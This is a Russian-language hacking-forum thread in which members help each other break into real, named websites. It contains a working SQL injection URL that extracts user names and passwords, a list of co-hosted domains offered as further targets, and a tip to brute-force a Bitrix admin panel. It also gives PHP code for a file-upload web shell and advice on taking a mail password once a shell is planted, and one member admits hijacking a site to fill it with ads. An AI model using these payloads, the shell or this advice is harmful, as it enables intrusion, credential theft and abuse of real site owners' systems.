Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Вот, по идее, всё правильно:
    _http://www.namakon.ru/articles.php?p=3+and+1=0+union+select+1,2,group_concat(concat_ws(0x3a3a3a,id,name,passwd)+separator+0x0b),4,5,6,7,8,9+from+users+limit+0,20--
    Что не так? помогите!!!
    :)
     
  2. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12

    http://www.namakon.ru/articles.php?p=3+and+1=0+union+select+1,2,count(*),4,5,6,7,8,9+from+users+--+

    Она пустая.
     
  3. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    То-есть нам нету пользователей что-ли??
     
  4. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12

    Точно.
     
  5. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Как такое может быть вообще?!
    Первый раз с таким сталкиваюсь... :D :D :D
    И что подскажете?
    Если на этом сайт ещё найду уязвимости, результат будет тот-же?! :rolleyes:
     
  6. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    Подпишусь под вышенаписанным и спрошу совета у знатоков.
    Есть подобная ситуация, на сайте 3 базы, 2 местные и information_schema, ни в одной ни единого пользователя, как быть?
     
  7. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Да. Ищи уязвимости на этом сервере на остальных сайтах, может быть, там прорвешься:

    # Домен
    1 www.catalonia-online.com
    2 elsteel.ru
    3 www.namakon.ru
    4 www.calc.ru
    5 www.extrimdrive.ru
    6 sodiamex.ru
    7 www.2dstudio.ru
    8 www.duol.ru
    9 www.artsok.com
    10 italia-online.ru
    11 www.analizfamilii.ru
    12 stroylist.ru
    13 www.forum.analizfamilii.ru
    14 www.cronstudio.ru
    15 autoledy.ru
    16 www.mosdoma.ru
    17 cron.ru
    18 roof-style.com
    19 citymulti.ru
    20 vtecktonik.ru
    21 frivent.ru
    22 autoledi.ru
    23 www.militaryband.ru
    24 smstechsupport.ru
    25 www.evstyle.ru
    26 expolink.ru
    27 zookormushka.ru
    28 www.superdog.ru
    29 www.stroyelite.ru
     
    1 person likes this.
  8. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Ага, спасибо =)
     
  9. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Просто нет пользователей...пользуйся советом:
     
  10. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Вот ещё вопрос...были ли в битриксе этого года уязвимости?!
    http://elsteel.ru/bitrix/admin/index.php
     
    1 person likes this.
  11. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    админка в битриксе брутится без проблем, так что вперёд :D
    --
    Вопрос:был доступ к сайту, напичкал его тизерами, зашёл админ (по сайту видно). Больше я зайти не могу. Опять залез в дырку - пароль тот же что и раньше, но заёти не могу. Деды, прокси, впн пробовал, не заходит. Что делать?
     
  12. [RedSky]

    [RedSky] Banned

    Joined:
    4 May 2011
    Messages:
    10
    Likes Received:
    11
    Reputations:
    10
    Ты даешь слишком мало информации, вопрос из разряда:
    "Была у меня белая шляпа - потерял, пробывал одевать на голову котелок, чайник >> не получилось. Как быть?"

    P.S. Osstudio ака IScript очень неудачный тролль
     
  13. scr1m77

    scr1m77 Member

    Joined:
    29 Dec 2010
    Messages:
    2
    Likes Received:
    6
    Reputations:
    2
    Есть пхп-инъекция в скрипте, сервер под виндой. Не могу залить шелл средствами пхп (fopen, copy и тп). Какие еще существуют способы залиться на виндовый сервер? Буду благодарен любой помощи. :)
     
  14. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    135
    Reputations:
    34
    движок вордпресс. кинопортал. иностранный.
    один день был в моём распоряжении через лог и пасс админа.
    На следующий день сменилась пара баннеров, появилась капча на входе в админку. Не могу войти, не понимаю почему.
    Через раскрученную скулю достаю пароль админа, который совпадает с тем, через который удачно заходил, но не могу зайти. Больше инфы нету
     
  15. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    scr1m77
    PHP:
    <?php if(@copy($_FILES["shell"]["tmp_name"], dirname(__FILE__).'/'.$_FILES["shell"]["name"])) print 'ok'; else print '<form method=post enctype="multipart/form-data"><input type="file" name="shell"><input type="submit"></form>';?>
     
    _________________________
    1 person likes this.
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886

    база mysql, таблица user
     
    _________________________
  17. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Ну ты даешь. Тизерами напичкал. У тебя с головой все нормально? Много поднял на тизерах то за один день?

    А насчет админки - наверное, ввели вход только для админского ip




    Где-то в районе /var/lib/mysql/
    Но 99% что ты не сможешь прочитать файлы там или даже войти в папку.
     
  18. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    Есть шелл на сайте, на сервере стоит SquirrelMail. Нужно узнать пароль от ящика, как это можно сделать?
     
  19. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Разве не в БД?
     
  20. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    В конфиге SquirrelMail должны быть данные для подключения к базе почтового сервера.
     
Thread Status:
Not open for further replies.